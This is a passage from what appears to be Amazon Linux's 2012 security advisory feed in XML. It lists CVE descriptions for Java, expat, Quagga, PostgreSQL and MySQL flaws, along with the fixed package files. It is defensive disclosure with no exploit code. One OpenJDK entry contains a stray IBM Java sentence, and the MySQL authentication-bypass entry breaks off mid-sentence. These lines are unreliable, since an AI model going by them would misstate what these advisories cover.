Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows local users to affect confidentiality via unknown vectors related to printing on Solaris or Linux.
It was discovered that various classes of the Java Runtime library could create temporary files with insecure permissions. A local attacker could use this flaw to gain access to the content of such temporary files.
829358:
CVE-2012-1717 OpenJDK: insecure temporary file permissions (JRE, 7143606)
CVE-2012-1716:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, and 5 update 35 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Swing.
It was discovered that the SynthLookAndFeel class from Swing did not properly prevent access to certain UI elements from outside the current application context. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine, or bypass Java sandbox restrictions.
829360:
CVE-2012-1716 OpenJDK: SynthLookAndFeel application context bypass (Swing, 7143614)
CVE-2012-1713:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, 1.4.2_37 and earlier, and JavaFX 2.1 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section.
Multiple flaws were discovered in the font manager's layout lookup implementation. A specially-crafted font file could cause the Java Virtual Machine to crash or, possibly, execute arbitrary code with the privileges of the user running the virtual machine.
829361:
CVE-2012-1713 OpenJDK: fontmanager layout lookup code memory corruption (2D, 7143617)
CVE-2012-1711:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to CORBA.
Multiple flaws were discovered in the CORBA (Common Object Request Broker Architecture) implementation in Java. A malicious Java application or applet could use these flaws to bypass Java sandbox restrictions or modify immutable object data.
829354:
CVE-2012-1711 OpenJDK: improper protection of CORBA data models (CORBA, 7079902)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1711" title="" id="CVE-2012-1711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1713" title="" id="CVE-2012-1713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1716" title="" id="CVE-2012-1716" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1717" title="" id="CVE-2012-1717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1718" title="" id="CVE-2012-1718" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1723" title="" id="CVE-2012-1723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1724" title="" id="CVE-2012-1724" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0729.html" title="" id="RHSA-2012:0729" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.3.45.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.11.3.45.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.11.3.45.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-89</id><title>Amazon Linux - ALAS-2012-89: medium priority package update for expat</title><issued date="2012-06-19 15:59:00" /><updated date="2014-09-14 16:21:00" /><severity>medium</severity><description>Package updates are 
available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1148:
Memory leak in the poolGrow function in expat/lib/xmlparse.c in expat before 2.1.0 allows context-dependent attackers to cause a denial of service (memory consumption) via a large number of crafted XML files that cause improperly-handled reallocation failures when expanding entities.
A memory leak flaw was found in Expat. If an XML file processed by an application linked against Expat triggered a memory re-allocation failure, Expat failed to free the previously allocated memory. This could cause the application to exit unexpectedly or crash when all available memory is exhausted.
801648:
CVE-2012-1148 expat: Memory leak in poolGrow
CVE-2012-0876:
The XML parser (xmlparse.c) in expat before 2.1.0 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via an XML file with many identifiers with the same value.
A denial of service flaw was found in the implementation of hash arrays in Expat. An attacker could use this flaw to make an application using Expat consume an excessive amount of CPU time by providing a specially-crafted XML file that triggers multiple hash function collisions. To mitigate this issue, randomization has been added to the hash function to reduce the chance of an attacker successfully causing intentional collisions.
786617:
CVE-2012-0876 expat: hash table collisions CPU usage DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0876" title="" id="CVE-2012-0876" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1148" title="" id="CVE-2012-1148" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0731.html" title="" id="RHSA-2012:0731" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="expat-devel" version="2.0.1" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.0.1-11.9.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.0.1" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.0.1-11.9.amzn1.i686.rpm</filename></package><package name="expat" version="2.0.1" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.0.1-11.9.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.0.1" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.0.1-11.9.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.0.1" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.0.1-11.9.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.0.1" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.0.1-11.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-90</id><title>Amazon Linux - ALAS-2012-90: low priority package update for quagga</title><issued date="2012-06-19 16:01:00" /><updated date="2014-09-14 16:37:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1820:
Two flaws were found in the way the bgpd daemon processed certain BGP OPEN messages. A configured BGP peer could cause bgpd on a target system to abort via a specially-crafted BGP OPEN message.
The bgp_capability_orf function in bgpd in Quagga 0.99.20.1 and earlier allows remote attackers to cause a denial of service (assertion failure and daemon exit) by leveraging a BGP peering relationship and sending a malformed Outbound Route Filtering (ORF) capability TLV in an OPEN message.
817580:
CVE-2012-1820 quagga (bgpd): Assertion failure by processing BGP OPEN message with malformed ORF capability TLV (VU#962587)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1820" title="" id="CVE-2012-1820" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="quagga-devel" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-devel-0.99.20.1-1.5.amzn1.i686.rpm</filename></package><package name="quagga-debuginfo" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-debuginfo-0.99.20.1-1.5.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-0.99.20.1-1.5.amzn1.i686.rpm</filename></package><package name="quagga-contrib" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-contrib-0.99.20.1-1.5.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-0.99.20.1-1.5.amzn1.x86_64.rpm</filename></package><package name="quagga-debuginfo" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-debuginfo-0.99.20.1-1.5.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-devel-0.99.20.1-1.5.amzn1.x86_64.rpm</filename></package><package name="quagga-contrib" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-contrib-0.99.20.1-1.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-91</id><title>Amazon Linux - ALAS-2012-91: medium priority package update for postgresql9</title><issued date="2012-06-19 16:02:00" /><updated date="2014-09-14 16:21:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2143:
The crypt_des (aka DES-based crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.
A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
A flaw was found in the DES algorithm implementation in the crypt() password hashing function in PHP. If the password string to be hashed contained certain characters, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength.
816956:
CVE-2012-2143 BSD crypt(): DES encrypted password weakness
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2143" title="" id="CVE-2012-2143" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql9-debuginfo" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-debuginfo-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-server" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-server-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-libs" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-libs-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-test" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-test-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-contrib" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-contrib-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-plpython" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plpython-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-plperl" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plperl-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-devel" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-devel-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-pltcl" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-pltcl-9.1.4-1.21.amzn1.i686.rpm</filename></package><package 
name="postgresql9-docs" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-docs-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-server" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-server-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-test" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-test-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plpython" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plpython-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-contrib" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-contrib-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-docs" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-docs-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-libs-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-devel" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-devel-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-debuginfo" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-debuginfo-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-pltcl" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-pltcl-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package 
name="postgresql9-plperl" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plperl-9.1.4-1.21.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-92</id><title>Amazon Linux - ALAS-2012-92: low priority package update for mysql51</title><issued date="2012-07-05 13:59:00" /><updated date="2014-09-14 16:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2102:
MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote authenticated users to cause a denial of service (assertion failure and mysqld abort) by deleting a record and using HANDLER READ NEXT.
A flaw was found in the way MySQL processed HANDLER READ NEXT statements after deleting a record. A remote, authenticated attacker could use this flaw to provide such requests, causing mysqld to crash. This issue only caused a temporary denial of service, as mysqld was automatically restarted after the crash.
812431:
CVE-2012-2102 mysql: Server crash on HANDLER READ NEXT after DELETE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2102" title="" id="CVE-2012-2102" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0874.html" title="" id="RHSA-2012:0874" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql51-server" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-bench" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.61" release="4.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql51-debuginfo-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.61-4.54.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-93</id><title>Amazon Linux - ALAS-2012-93: important priority package update for mysql55</title><issued date="2012-07-05 16:07:00" /><updated date="2014-09-14 16:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2122:
This update also adds a patch for a potential flaw in the MySQL password checking function, which could allow an attacker to log into any MySQL account without knowing the correct password. This problem
814605:
CVE-2012-2122 mysql: incorrect type cast in check_scramble() leading to authentication bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122" title="" id="CVE-2012-2122" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql55-embedded-devel" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.24" 
release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.24-1.24.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-94</id><title>Amazon Linux - ALAS-2012-94: medium priority package update for postgresql8</title><issued 
date="2012-07-05 16:08:00" /><updated date="2014-09-14 16:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2655:
PostgreSQL 8.3.x before 8.3.19, 8.4.x before 8.4.12, 9.0.x before 9.0.8, and 9.1.x before 9.1.4 allows remote authenticated users to cause a denial of service (server crash) by adding the (1) SECURITY DEFINER or (2) SET attributes to a procedural language's call handler.
A denial of service flaw was found in the way the PostgreSQL server performed a user privileges check when applying SECURITY DEFINER or SET attributes to a procedural language's (such as PL/Perl or PL/Python) call handler function. A non-superuser database owner could use this flaw to cause the PostgreSQL server to crash due to infinite recursion.
825995:
CVE-2012-2655 postgresql: Ability of database owners to install procedural languages via CREATE LANGUAGE found unsafe (DoS)
CVE-2012-2143:
The crypt_des (aka DES-based crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.
A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
A flaw was found in the DES algorithm implementation in the crypt() password hashing function in PHP. If the password string to be hashed contained certain characters, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength.
816956:
CVE-2012-2143 BSD crypt(): DES encrypted password weakness
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2143" title="" id="CVE-2012-2143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2655" title="" id="CVE-2012-2655" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1037.html" title="" id="RHSA-2012:1037" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql8-test" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.12" release="1.35.amzn1" epoch="0" 
